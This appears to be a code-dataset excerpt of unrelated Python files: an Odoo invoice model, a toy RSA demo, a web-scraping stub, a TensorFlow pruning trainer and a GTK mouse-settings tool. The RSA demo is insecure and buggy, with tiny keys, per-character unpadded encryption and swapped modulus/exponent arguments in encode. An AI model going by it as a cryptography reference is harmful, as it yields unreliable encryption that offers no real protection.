fields.Char('L/C id')\n lc_num = fields.Char('L/C No.')\n lc_num2 = fields.Char(string='L/C No.')\n lc_date = fields.Date(string='L/C Dated')\n lc_date2 = fields.Date(string='L/C Dated')\n issuing_bank = fields.Text(string='Issuing Bank')\n vat_code = fields.Char(string='VAT No.' )\n irc_num = fields.Char(string='IRC No.' )\n bin_num = fields.Char(string='BIN No.' ) \n tin_num = fields.Char(string='TIN No.' )\n amend_no = fields.Char(string='Amend No' )\n amend_date = fields.Date(string='Amend Date' )\n ordered_products_name = fields.Text(string='ordered_products_name') \n ordered_products_number_of_bags = fields.Text(string='ordered_products_number_of_bags') \n ordered_products_quantity = fields.Text(string='ordered_products_quantity') \n ordered_products_price_of_unit = fields.Text(string='ordered_products_price_of_unit')\n ordered_products_amount = fields.Text(string='ordered_products_amount')\n ordered_products_total_quantity = fields.Char(string='ordered_products_total_quantity')\n ordered_products_total_amount = fields.Char(string='Total')\n ordered_products_total_amount_in_word = fields.Char(string='ordered_products_total_amount_in_word')\n currency_symbol_name = fields.Char(string='currency_symbol_name')\n currency_symbol_name1 = fields.Char(string='currency_symbol_name')\n currency_symbol_name2 = fields.Char(string='currency_symbol_name')\n currency_symbol = fields.Char(string='currency_symbol')\n currency_symbol1 = fields.Char(string='currency_symbol')\n currency_symbol2 = fields.Char(string='currency_symbol')\n contact_no = fields.Text(string='contact no',default='Export Sales Contract No. MCFN-MK010-018 dated 07-APR-18')\n only_seq_num = fields.Char(string='only_seq_num', size=255)\n num_of_bags = fields.Char(string='num_of_bags', size=255)\n delivery_order_num = fields.Char(string='Delivery Order Number') \n delivery_challan_num = fields.Char(string='Delivery Challan Number')\n delivery_order_created_date = fields.Date(string='Delivery Order Created date')\n\n @api.model\n def create(self, vals):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n \"\"\"\n if not vals:\n vals = {}\n seq_obj = self.env['ir.sequence']\n seq_obj2 = self.env['ir.sequence']\n invoice_num = seq_obj.next_by_code('commercial_invoice_report_num') or 'New'\n only_num = seq_obj2.next_by_code('only_num') or 'New_seqq'\n vals['name'] = invoice_num\n vals['only_seq_num'] = only_num\n return super(CommercialInvoiceModel, self).create(vals)\n\n def onchange_pi_id(self, cr, uid, ids, pi_id=False, context=None):\n res= {}\n if pi_id:\n service_obj= self.pool.get('sale.order').browse(cr, uid,pi_id,context=context) \n service_obj2= self.pool.get('res.partner').browse(cr, uid,service_obj.partner_id.id,context=context)\n service_obj3= self.pool.get('res.country').browse(cr, uid,service_obj2.country_id.id,context=context)\n currency_symbol= self.pool.get('res.currency').browse(cr, uid,service_obj.currency_id.id,context=context)\n cus_name = service_obj2.name\n cus_full_address = str(service_obj2.street) + \", \" + str(service_obj2.street2) + \", \" + str(service_obj2.city)+ \" - \" + str(service_obj2.zip) + \", \" + str(service_obj3.name)\n lc_id = service_obj.lc_num_id\n lc_service_obj= self.pool.get('lc_informations.model')\n rec = lc_service_obj.browse(cr, uid, lc_id.id)\n lc_bank_name = rec.bank_name2\n lc_bank_branch = rec.bank_branch\n lc_bank_address = rec.bank_address\n vat_no = rec.vat_no\n irc_no = rec.irc_no\n bin_no = rec.bin_no\n tin_no = rec.tin_no\n amend_no = rec.amend_no\n amend_date = rec.amend_date\n bank_info = str(lc_bank_name) + \"\\n\" + str(lc_bank_branch) + \"\\n\" + str(lc_bank_address)\n account_invoice_ids = self.pool.get('account.invoice').search(cr, uid,[('pi_no','=',service_obj.name),('process','=','set_for_LC')],context=context)\n if not account_invoice_ids:\n # print('Account invoice list is empty.')\n raise except_orm(_('Validation!'),\n _(\"No document ready for set L/C document under PI No. %s !\")% (service_obj.name,))\n else:\n invoice_line_pool_ids = self.pool.get('account.invoice.line').search(cr, uid,[('invoice_id','=',account_invoice_ids),],context=context) \n invoice_lines_product_name = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['name'], context=context)\n invoice_lines_product_quantity = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['quantity','name'], context=context)\n invoice_lines_product_price_of_unit = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['price_unit','name'], context=context)\n invoice_lines_product_amount = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['price_subtotal','name'], context=context)\n num_of_bags = service_obj.bags_of_packing\n ordered_products_names = self.split_products_names(invoice_lines_product_name) \n ordered_products_number_of_bags = self.split_products_number_of_bags(invoice_lines_product_quantity,num_of_bags)\n ordered_products_quantity = self.split_products_quantity(invoice_lines_product_quantity)\n ordered_products_price_of_unit = self.split_products_price_of_unit(invoice_lines_product_price_of_unit)\n ordered_products_amount = self.split_products_amount(invoice_lines_product_amount)\n ordered_products_total_quantity = self.products_total_quantity(invoice_lines_product_quantity)\n ordered_products_total_amount = self.products_total_amount(invoice_lines_product_amount)\n ordered_products_total_amount_in_word = self.numToWords(ordered_products_total_amount)\n\n do_no_read = self.pool.get('account.invoice').read(cr, uid,account_invoice_ids,['do_no'], context=context)\n do_no = self.split_do_no(do_no_read)\n stock_picking_ser_ids= self.pool.get('stock.picking').search(cr, uid,[('origin','=',service_obj.name),],context=context)\n order_date_read = self.pool.get('stock.picking').read(cr, uid,stock_picking_ser_ids,['date'], context=context)\n delivery_order_date = self.split_order_date_read(order_date_read)\n\n res = {'value':{\n 'customer_name':cus_name,\n 'customer_name2':service_obj2.name, \n 'customer_full_address':cus_full_address,\n 'proforma_invoice_id':service_obj.name,\n 'proforma_invoice_created_date':service_obj.create_date,\n 'supplier_factory_name':service_obj.place_of_delivery_name2, \n 'supplier_factory_address':service_obj.place_of_delivery_addr, \n 'client_shipping_factory_address':service_obj.cus_factory_addr,\n 'destination_address': service_obj.cus_factory_addr,\n 'erc_no':service_obj.erc_no,\n 'country_of_origin':service_obj.country_of_origin2,\n 'country_of_origin2':service_obj.country_of_origin2,\n 'num_of_bags': service_obj.bags_of_packing, \n 'lc_id':lc_id.id,\n 'lc_num':rec.name,\n 'lc_num2':rec.name,\n 'lc_date':rec.created_date,\n 'issuing_bank':bank_info,\n 'lc_date2':rec.created_date,\n 'vat_code':rec.vat_no,\n 'irc_num':rec.irc_no,\n 'bin_num':rec.bin_no, \n 'tin_num':rec.tin_no,\n 'amend_no':rec.amend_no,\n 'amend_date':rec.amend_date,\n 'ordered_products_name':ordered_products_names,\n 'ordered_products_number_of_bags':ordered_products_number_of_bags,\n 'ordered_products_quantity':ordered_products_quantity,\n 'ordered_products_price_of_unit':ordered_products_price_of_unit,\n 'ordered_products_amount': ordered_products_amount,\n 'ordered_products_total_quantity': \"{:,}\".format(ordered_products_total_quantity),\n 'ordered_products_total_amount': \"{:,}\".format(ordered_products_total_amount),\n 'ordered_products_total_amount_in_word':ordered_products_total_amount_in_word,\n 'currency_symbol_name':currency_symbol.name,\n 'currency_symbol_name1':currency_symbol.name,\n 'currency_symbol_name2':currency_symbol.name,\n 'currency_symbol':currency_symbol.symbol,\n 'currency_symbol1':currency_symbol.symbol,\n 'currency_symbol2':currency_symbol.symbol, \n 'delivery_order_num':do_no, \n 'delivery_order_created_date':delivery_order_date, \n }}\n else:\n res={} \n return res \n\n def split_order_date_read(self,order_date_read):\n seen = set()\n date= []\n answer = []\n for r in order_date_read: \n date.append(r['date'])\n combine_date = '\\n'.join([str(i) for i in date])\n for line in combine_date.splitlines():\n if line not in seen:\n seen.add(line)\n answer.append(line)\n combine = '\\n'.join(answer)\n return combine\n\n def split_do_no(self,do_no_read):\n seen = set()\n do= []\n answer = []\n for r in do_no_read: \n do.append(r['do_no'])\n combine_do = '\\n'.join([str(i) for i in do])\n for line in combine_do.splitlines():\n if line not in seen:\n seen.add(line)\n answer.append(line)\n combine = '\\n'.join(answer)\n return combine \n\n def split_products_names(self,invoice_lines_product_name):\n seen = set()\n answer = []\n names= []\n for r in invoice_lines_product_name:\n names.append(r['name'])\n combine_names = '\\n'.join([str(i) for i in names])\n for line in combine_names.splitlines():\n if line not in seen:\n seen.add(line)\n answer.append(line)\n combine = '\\n'.join(answer)\n return combine \n\n def split_products_number_of_bags(self,invoice_lines_product_quantity,num_of_bags):\n number_of_bags= []\n bags = int(num_of_bags)\n testListDict = {}\n for item in invoice_lines_product_quantity:\n try:\n d=item['name']\n testListDict[d] += int(item['quantity'] / bags)\n except:\n d=item['name']\n testListDict[d] = int(item['quantity'] / bags)\n \n for the_key, the_value in testListDict.iteritems():\n number_of_bags.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in number_of_bags])\n return combine \n\n def split_products_quantity(self,invoice_lines_product_quantity):\n quantity= []\n testListDict = {}\n for item in invoice_lines_product_quantity:\n try:\n d=item['name']\n testListDict[d] += int(item['quantity']) \n except:\n d=item['name']\n testListDict[d] = int(item['quantity'])\n\n for the_key, the_value in testListDict.iteritems():\n quantity.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in quantity])\n return combine \n\n def split_products_price_of_unit(self,invoice_lines_product_price_of_unit):\n price_of_unit= []\n testListDict = {}\n for item in invoice_lines_product_price_of_unit:\n try:\n d=item['name']\n testListDict[d] = item['price_unit'] \n except:\n d=item['name']\n testListDict[d] = item['price_unit']\n\n for the_key, the_value in testListDict.iteritems():\n price_of_unit.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in price_of_unit])\n return combine\n\n def split_products_amount(self,invoice_lines_product_amount):\n amount= []\n testListDict = {}\n for item in invoice_lines_product_amount:\n try:\n d=item['name']\n testListDict[d] += int(item['price_subtotal']) \n except:\n d=item['name']\n testListDict[d] = int(item['price_subtotal'])\n\n for the_key, the_value in testListDict.iteritems():\n amount.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in amount])\n return combine \n\n def products_total_quantity(self,invoice_lines_product_quantity):\n total_quantity= []\n for r in invoice_lines_product_quantity: \n total_quantity.append(r['quantity'])\n in_com = sum(total_quantity)\n combine = int(in_com)\n return combine \n\n def products_total_amount(self,invoice_lines_product_amount):\n total_amount= []\n idx = 0\n for r in invoice_lines_product_amount:\n total_amount.append(r['price_subtotal'])\n combine = sum(total_amount)\n return combine\n\n def onchange_client_shipping_factory_name(self, cr, uid, ids, client_shipping_factory_name=False, context=None):\n res= {}\n if client_shipping_factory_name:\n service_obj= self.pool.get('customer_factory_name_address.model')\n rec = service_obj.browse(cr, uid, client_shipping_factory_name)\n res = {'value':{\n 'client_shipping_factory_address':rec.address,\n 'destination_address':rec.address\n }}\n else:\n res={} \n return res\n\n def onchange_supplier_factory_name(self, cr, uid, ids, supplier_factory_name=False, context=None):\n res= {}\n if supplier_factory_name:\n service_obj= self.pool.get('supplier_factory_name_address.model')\n rec = service_obj.browse(cr, uid, supplier_factory_name)\n res = {'value':{\n 'supplier_factory_address':rec.address\n }}\n else:\n res={} \n return res\n\n def numToWords(self,num,join=True):\n '''words = {} convert an integer number into words'''\n units = ['','one','two','three','four','five','six','seven','eight','nine']\n teens = ['','eleven','twelve','thirteen','fourteen','fifteen','sixteen', \\\n 'seventeen','eighteen','nineteen']\n tens = ['','ten','twenty','thirty','forty','fifty','sixty','seventy', \\\n 'eighty','ninety']\n thousands = ['','thousand','million','billion','trillion','quadrillion', \\\n 'quintillion','sextillion','septillion','octillion', \\\n 'nonillion','decillion','undecillion','duodecillion', \\\n 'tredecillion','quattuordecillion','sexdecillion', \\\n 'septendecillion','octodecillion','novemdecillion', \\\n 'vigintillion']\n words = []\n if num==0: words.append('zero')\n else:\n numStr = '%d'%num\n numStrLen = len(numStr)\n groups = (numStrLen+2)/3\n numStr = numStr.zfill(groups*3)\n for i in range(0,groups*3,3):\n h,t,u = int(numStr[i]),int(numStr[i+1]),int(numStr[i+2])\n g = groups-(i/3+1)\n if h>=1:\n words.append(units[h])\n words.append('hundred')\n if t>1:\n words.append(tens[t])\n if u>=1: words.append(units[u])\n elif t==1:\n if u>=1: words.append(teens[u])\n else: words.append(tens[t])\n else:\n if u>=1: words.append(units[u])\n if (g>=1) and ((h+t+u)>0): words.append(thousands[g]+',')\n if join: return ' '.join(words)\n return words\n\n # def split_products_names(self,invoice_lines_product_name):\n # names= []\n # idx = 0\n # for r in invoice_lines_product_name:\n # names.append(r['name'])\n # combine = '\\n'.join([str(i) for i in names]) \n # return combine \n\n # def split_from_list(self,list_name,data_field):\n # save = []\n # for r in list_name:\n # save.append(r[data_field])\n # combine = '\\n'.join([str(i) for i in save])\n # return combine \n\n\n\n\n\n\n\n\n","repo_name":"Arnavbd1971/lc_report_generator_odoo8_aahold","sub_path":"models/commercial_invoices.py","file_name":"commercial_invoices.py","file_ext":"py","file_size_in_byte":18554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31571694173","text":"import time\nfrom apa import LongA\nfrom math import gcd, ceil, sqrt, floor\nfrom random import randint, randrange\n\n\nclass RSA:\n def __init__(self, num_bits):\n self.input_message = str()\n self.num_bits = num_bits\n self.prime1 = 0\n self.prime2 = 0\n self.modul = 0\n self.public_keys = tuple()\n self.private_keys = tuple()\n\n def __genprime(self, k):\n x = \"\"\n k = int(k)\n for y in range(k):\n x = x + \"1\"\n y = \"1\"\n for z in range(k-1):\n y = y + \"0\"\n x = int(x,2)\n y = int(y,2)\n p = 0\n while True:\n p = randrange(y,x)\n if self.__rabin_miller(p):\n break\n return p\n\n def gen_private_keys(self):\n gdc, x, d = self.__gcdExtended(self.public_keys[0], self.public_keys[1])\n self.private_keys = (self.public_keys[0], d)\n\n def get_public_keys(self):\n e = 65537\n while True:\n self.prime1 = self.__genprime(self.num_bits//2)\n if self.prime1 % e != 1:\n break\n \n while True:\n self.prime2 = self.__genprime(self.num_bits//2)\n if self.prime2 % e != 1:\n break\n\n N = self.prime1*self.prime2\n \n lam = self.__carmichael(int(N))\n\n if gcd(e, lam) == 1:\n self.public_keys = (N, e)\n else: \n e_test = 0\n while True:\n e_test = randint(2, lam)\n if e_test % 2 == 0:\n continue\n else:\n if self.__rabin_miller(e_test):\n if gcd(e_test, lam) == 1:\n break \n \n e = e_test\n self.public_keys = (N, e)\n\n def __gcdExtended(self, a, b): \n if a == 0 : \n return b,0,1\n \n gcd, x1, y1 = self.__gcdExtended(b%a, a) \n \n x = y1 - (b//a) * x1 \n y = x1 \n \n return gcd, x, y\n\n def __rabin_miller(self, p):\n if(p < 2):\n return False\n if p != 2 and p % 2 == 0:\n return False\n s = p - 1\n t = 0\n while(s % 2 == 0):\n s >>= 1\n t += 1\n\n for i in range(20):\n a = randint(2, p - 2)\n #a_temp = int(a)\n #s_temp = int(s)\n #p_temp = int(p)\n #b = LongA.to_number(pow(a_temp, s_temp, p_temp))\n b = pow(a, s, p)\n if b == 1 or b == p - 1:\n continue\n for i in range(t):\n b = (b * b) % p\n\n if b == 1:\n return False\n if b == p - 1:\n break\n\n return True\n\n def __carmichael(self, n: int):\n n=int(n)\n k=2\n a=1\n alist=[]\n\n while not ((gcd(a,n))==1):\n a=a+1\n\n while ((gcd(a,n))==1) & (a<=n) :\n alist.append(a)\n a=a+1\n while not ((gcd(a,n))==1):\n a=a+1\n\n timer=len(alist)\n while timer>=0:\n for a in alist:\n if (a**k)%n==1:\n timer=timer-1\n if timer <0:\n break\n pass\n else:\n timer=len(alist)\n k=k+1\n return k\n\n def encode(self, message: str):\n words = message.split()\n encrypted = []\n for word in words:\n encrypted_word = []\n for c in word:\n c_ascii = ord(c)\n c_cypher = pow(c_ascii, self.public_keys[0], self.public_keys[1])\n encrypted_word.append(c_cypher)\n encrypted.append(encrypted_word)\n\n return encrypted\n\n\n def decode(self, message):\n decoded_message = \"\"\n for word in message:\n decoded_word = \"\"\n for cypher in word:\n m = pow(cypher, self.private_keys[1], self.private_keys[0])\n m = chr(m)\n decoded_word = decoded_word + m\n decoded_message = decoded_message + decoded_word\n return decoded_message\n\nclass Bob:\n def __init__(self, message, public_keys = None):\n self.message = message\n self.public_keys = public_keys\n self.RSA = RSA(10)\n self.RSA.input_message = self.message\n \n def code_messages(self):\n self.RSA.public_keys = self.public_keys\n self.message = self.RSA.encode(self.message)\n \nclass Alice:\n def __init__(self):\n self.message = None\n self.public_keys = list()\n self.private_keys = list()\n self.RSA = RSA(10)\n\n def create_keys(self):\n self.RSA.get_public_keys()\n self.public_keys = self.RSA.public_keys\n \n def decode_message(self):\n self.RSA.input_message = self.message\n self.RSA.gen_private_keys()\n self.private_keys = self.RSA.private_keys\n print(f\"Pricate keys: {self.private_keys}\")\n self.message = self.RSA.decode(self.message)\n \n\"\"\"\ndef rabin_miller(p):\n if(p < 2):\n return False\n if p != 2 and p % 2 == 0:\n return False\n s = p - 1\n t = 0\n while(s % 2 == 0):\n s >>= 1\n t += 1\n\n for i in range(20):\n a = randint(2, p - 2)\n a_temp = int(a)\n s_temp = int(s)\n p_temp = int(p)\n b = LongA.to_number(pow(a_temp, s_temp, p_temp))\n #b = LongA.pow(a, s, p)\n if b == 1 or b == p - 1:\n continue\n for i in range(t):\n b = (b * b) % p\n\n if b == 1:\n return False\n if b == p - 1:\n break\n\n return True\n\"\"\"\ndef miller_rabin(n):\n\n if n == 2 or n == 3:\n return True\n\n if n % 2 == 0:\n return False\n\n r = 0\n s = n - 1\n while s % 2 == 0:\n r += 1\n s //= 2\n for _ in range(10):\n a = randrange(2, n - 1)\n a_temp = int(a)\n s_temp = int(s)\n p_temp = int(n)\n x = LongA.to_number(pow(a_temp, s_temp, p_temp))\n #x = pow(a, s, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(r - 1):\n a_temp = int(x)\n s_temp = int(s)\n p_temp = int(n)\n x = LongA.to_number(pow(a_temp, 2, p_temp))\n #x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True\n\n\ndef genprimeBits(k):\n x = \"\"\n k = int(k)\n for y in range(k):\n x = x + \"1\"\n y = \"1\"\n for z in range(k-1):\n y = y + \"0\"\n x = int(x,2)\n y = int(y,2)\n p = 0\n while True:\n p = randrange(y,x)\n p = LongA(str(p))\n if miller_rabin(p):\n break\n return p\n \n\n#inp = input(\"Long number: \")\n#inp = LongA(inp)\n#print(f\"is prime: {rabin_miller(inp)}\")\n#print(f\"is prime: {miller_rabin(inp)}\")\n#inp = input(\"Number of bits: \")\n#inp = LongA(inp)\n#ans = genprimeBits(inp)\n#print(f\"rand prime number with {inp} bits: {ans}\")\n#print(f\"ans as binary {ans.as_binary()}\")\n#print(f\"ans as base64 {ans.as_base64()}\")\n#print(f\"ans as bytes object {ans.as_bytes()}\")\n\nMESSAGE:str = \"HELLO\"\nBob = Bob(MESSAGE)\nAlice = Alice()\nAlice.create_keys()\nprint(f\"Public keys {Alice.public_keys}\")\nBob.public_keys = Alice.public_keys\nBob.code_messages()\nprint(f\"{MESSAGE} is now Encoded message {Bob.message}\")\nAlice.message = Bob.message\nAlice.decode_message()\nprint(f\"massage decoded by Alice: {Alice.message}\")\n","repo_name":"MaksymRud/cryptography","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13057833649","text":"import requests\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef word():\r\n qq = soup.find('span', {'class': 'word'})\r\n ww = qq.string\r\n print(ww)\r\n\r\ndef vocab():\r\n url=\"https://www.vocabulary.com/dictionary/abst\"\r\n\r\n list = requests.get(url).text\r\n soup=BeautifulSoup(list , \"html.parser\")\r\n qqq=soup.findAll(\"div\",{\"class\" : \"autocomplete\"})\r\n qq=soup.find('span', {'class' : 'word'})\r\n ww=qq.string\r\n print(ww)\r\n '''for item in qqq:\r\n if \"word\" :\r\n print (item.attr)'''\r\n '''inputTag = soup.find(attrs={\"name\": \"stainfo\"})\r\n output = inputTag['value']'''\r\n # qq=qqq['word']\r\n # print(qqq)\r\n # eee=soup.findAll(\"div\",{\"class\":\"centeredContent\"})\r\n fff=soup.findAll(\"p\", {\"class\":\"short\"})\r\n print(fff)\r\n\r\n ggg=soup.findAll(\"p\", {\"class\": \"long\"})\r\n print(ggg)\r\nvocab()\r\n\r\n\r\n #class section blurb\r\n #and long\r\n\r\n #class didyoumean ((skip","repo_name":"nishanth-bs/Vocab","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14142339521","text":"import os\nimport tensorflow as tf\nimport time\nimport numpy as np\nimport sys\nPATH = os.getcwd()\nsys.path.insert(1, 'PATH')\nimport augment\n\n\ndef train(args, model, sess, dataset,sp_bool):\n print('|========= START TRAINING =========|')\n tf.set_random_seed(args.seed)\n np.random.seed(args.seed)\n if not os.path.isdir(args.path_summary): os.makedirs(args.path_summary)\n if not os.path.isdir(args.path_model): os.makedirs(args.path_model)\n saver = tf.train.Saver()\n random_state = np.random.RandomState(args.seed)\n writer = {}\n writer['train'] = tf.summary.FileWriter(args.path_summary + '/train', sess.graph)\n writer['val'] = tf.summary.FileWriter(args.path_summary + '/val')\n t_start = time.time()\n check_convergence=[]\n convergence = False\n iters = args.train_iterations_sp if sp_bool else args.train_iterations\n for itr in range(iters):\n if convergence:\n break\n batch = dataset.get_next_batch('train', args.batch_size)\n batch = augment.augment(batch, args.aug_kinds, random_state)\n feed_dict = {}\n feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})\n feed_dict.update({model.compress: False, model.is_train: True, model.pruned: True, model.sp: sp_bool})\n input_tensors = [model.outputs] # always execute the graph outputs\n if (itr+1) % args.check_interval == 0:\n input_tensors.extend([model.summ_op, model.sparsity])\n input_tensors.extend([model.train_op])\n result = sess.run(input_tensors, feed_dict)\n\n # Check on validation set.\n if (itr+1) % args.check_interval==0: #args.check_interval == 0:\n batch = dataset.get_next_batch('val', args.batch_size)\n batch = augment.augment(batch, args.aug_kinds, random_state)\n feed_dict = {}\n feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})\n feed_dict.update({model.compress: False, model.is_train: False, model.pruned: True, model.sp: sp_bool})\n input_tensors = [model.outputs, model.summ_op, model.sparsity]\n result_val = sess.run(input_tensors, feed_dict)\n check_convergence.append(result_val[0]['los'])\n #Check if the model is converged, if yes, the training will stop\n if len(check_convergence)>20:\n if min(check_convergence[-20:])>min(check_convergence[:-20]):\n convergence = True\n\n # Check summary and print results\n if (itr+1) % args.check_interval == 0:\n writer['train'].add_summary(result[1], itr)\n writer['val'].add_summary(result_val[1], itr)\n pstr = '(train/val) los:{:.3f}/{:.3f} acc:{:.3f}/{:.3f} spa:{:.3f}'.format(\n result[0]['los'], result_val[0]['los'],\n result[0]['acc'], result_val[0]['acc'],\n result[2],\n )\n print('itr{}: {} (t:{:.1f})'.format(itr+1, pstr, time.time() - t_start))\n t_start = time.time()\n\n # Save model\n if (itr+1) % args.save_interval == 0:\n saver.save(sess, args.path_model + '/itr-' + str(itr))\n","repo_name":"jbpuype/SNIP-SP","sub_path":"snip-sp/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15549066945","text":"#!python3\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, Gio\n\nimport subprocess\nimport os\nimport time\n\nhome = os.environ[\"HOME\"] + '/'\nos.chdir(home)\nif os.path.isdir(\".mouse_config\") == False:\n\tos.mkdir(\".mouse_config\") \n\tos.chdir(\".mouse_config\")\nelse:\n\tos.chdir(home+'.mouse_config')\n\nlicense = subprocess.run(['python', 'license.py'], stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n\t\t\t\t\n\t\t\nclass mouse_config(Gtk.Window):\n\tdef __init__(self):\n \n\t\tGtk.Window.__init__(self, title=\"Mouse Config\")\n\t\tself.set_position(Gtk.WindowPosition.CENTER)\n\t\tself.set_border_width(10)\n\t\t\n\t\theaderBar = Gtk.HeaderBar()\n\t\theaderBar.set_show_close_button(True)\n\t\theaderBar.props.title = 'Velocity'\n\t\tself.set_titlebar(headerBar)\n\t\t\n\t\tabout_button = Gtk.Button()\n\t\ticon = Gio.ThemedIcon(name='help-about-symbolic')\n\t\timage = Gtk.Image.new_from_gicon(icon, Gtk.IconSize.BUTTON)\n\t\tabout_button.add(image)\n\t\tabout_button.connect('clicked', self.about_btn_activate)\n\t\theaderBar.pack_start(about_button)\n \n\t\tglobal mouseCombo\n\t\tmouseCombo = Gtk.ComboBoxText()\n\t\tmouseCombo.connect(\"changed\", self.mouse_selected)\n\t\tmouseCombo.set_size_request(360, 30)\n\t\t\n\t\taccel_label = Gtk.Label()\n\t\taccel_label.set_markup(\"Acceleration\")\n\t\t\n\t\tadjustment = Gtk.Adjustment(value=0,\n \t\t\t\t\t\t\tlower=0,\n \t\t\t\t\t\t\tupper=100,\n \t\t\t\t\t\t\tstep_increment=1,\n \t\t\t\t\t\t\tpage_increment=5,\n \t\t\t\t\t\t\tpage_size=0)\n\t\tself.accel_spin = Gtk.SpinButton()\n\t\tself.accel_spin.set_adjustment(adjustment)\n\t\tself.accel_value = self.accel_spin.get_value()\n\t\tself.accel_value = int(self.accel_value)\n\t\tself.accel_spin.connect(\"value-changed\", self.accel_spin_changed)\n\t\t\n\t\tdecel_label = Gtk.Label()\n\t\tdecel_label.set_markup(\"Deceleration\")\n \n\t\tadjustment = Gtk.Adjustment(value=0,\n \t\t\t\t\t\t\tlower=0,\n \t\t\t\t\t\t\tupper=100,\n \t\t\t\t\t\t\tstep_increment=1,\n \t\t\t\t\t\t\tpage_increment=5,\n \t\t\t\t\t\t\tpage_size=0)\n\t\tself.decel_spin = Gtk.SpinButton()\n\t\tself.decel_spin.set_adjustment(adjustment)\n\t\tself.decel_value = self.decel_spin.get_value()\n\t\tself.decel_spin.connect('value-changed', self.decel_spin_changed)\n\t\t\n\t\tself.startup_Button = Gtk.Button(label=\"Run on Startup?\")\n\t\tself.startup_Button.connect('clicked', self.startup_clicked)\n\t\t\n\t\tgrid = Gtk.Grid()\t\n\t\t\n\t\tlistBox = Gtk.ListBox()\n\t\tempty_label = Gtk.Label()\n\t\t\n\t\trow1 = Gtk.ListBoxRow()\n\t\thbox1 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=140)\n\t\thbox1.pack_start(accel_label, True, True, 0)\n\t\thbox1.pack_start(self.accel_spin, False, True, 0)\n\t\trow1.add(hbox1)\n\t\tlistBox.add(row1)\n\t\t\n\t\trow2 = Gtk.ListBoxRow()\n\t\thbox2 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=140)\n\t\thbox2.pack_start(decel_label, True, True, 0)\n\t\thbox2.pack_start(self.decel_spin, False, True, 0)\n\t\trow2.add(hbox2)\n\t\tlistBox.add(row2)\t\n\t\t\n\t\trow3 = Gtk.ListBoxRow()\n\t\thbox3 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n\t\tempty_label1 = Gtk.Label()\n\t\thbox3.pack_start(empty_label1, True, True, 0)\n\t\trow3.add(hbox3)\n\t\tlistBox.add(row3)\n\t\t\n\t\trow4 = Gtk.ListBoxRow()\n\t\thbox4 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n\t\thbox4.pack_start(self.startup_Button, True, True, 0)\n\t\trow4.add(hbox4)\n\t\tlistBox.add(row4)\n\t\t\n\n\t\tgrid.add(mouseCombo)\n\t\tgrid.attach(empty_label, 0, 2, 1, 1)\n\t\tgrid.attach(listBox, 0, 4, 1, 2)\n\t\tself.add(grid)\n\t\n\t\t\n\t\t#####################################################################################################################\n\t\t#####################################################################################################################\n\t\t\n\t\txinput_output = subprocess.run(['xinput','--list'], stdout=subprocess.PIPE).stdout.decode('utf-8')\t\n\t\t\n\t\t# create file '.pointers'\n\t\tif os.path.isfile('.pointers'):\n\t\t\tprint('overwriting..')\n\t\t\tos.system('rm -rf .pointers')\n\t\t\tos.system('touch .pointers')\n\t\telse:\n\t\t\tos.system('touch .pointers')\n\t\t\t\n\t\t# counters\n\t\tcounter=0\n\t\tposition=0\t# changes after first loop to counter - \n\t\t\t\t\t# for each successful 'if' clause position is value of all characters to remove \n\t\t\t\t\t# from start of variable 'x'\t\t\n\t\tctr=0\t\n\t\tfor i in xinput_output:\t\n\t\t\tif i in ']': # ']' is close to end of line\n\t\t\t\tx = len(xinput_output) - (counter)\n\t\t\t\tx = xinput_output[:-x] # remove from end to after ']' \n\t\t\t\tx = x[position:] # slice first item in string\n\t\t\t\tx = x[7:] # removes '⎜ ↳' from the start\n\t\t\t\t\n\t\t\t\twith open('.pointers', 'a') as f:\n\t\t\t\t\tf.write('{}\\n'.format(x))\n\t\t\t\t\n\t\t\t\tposition = counter \n\t\t\t\tctr+=1\n\t\t\tcounter+=1\n\t\t\n\t\t# search for pointer, trim whitespace and get id of device in 'line'\n\t\tself.p_names = [] # to hold pointer names\n\t\tself.p_ids = [] # to hold pointer ids\n\t\tself.name_id = {} # dictionary to hold 'name':id\n\t\tctr1=0\n\t\twith open('.pointers', 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tif 'slave pointer' in line:\n\t\t\t\t\tctr=0\n\t\t\t\t\tfor item in line: \n\t\t\t\t\t\t# find id\n\t\t\t\t\t\tif item in '=': # '=' is followed by the id\n\t\t\t\t\t\t\tif self.confirm_id(ctr, line):\n\t\t\t\t\t\t\t\tprint('\\tPointer id -- {}\\n\\n\\n'.format(self.p_ids))\n\t\t\t\t\t\t\tself.trim_whitespace(ctr, line)\n\t\t\t\t\t\t\t# add name and id to dict 'self.name_id'\n\t\t\t\t\t\t\tself.name_id[self.p_names[ctr1]] = 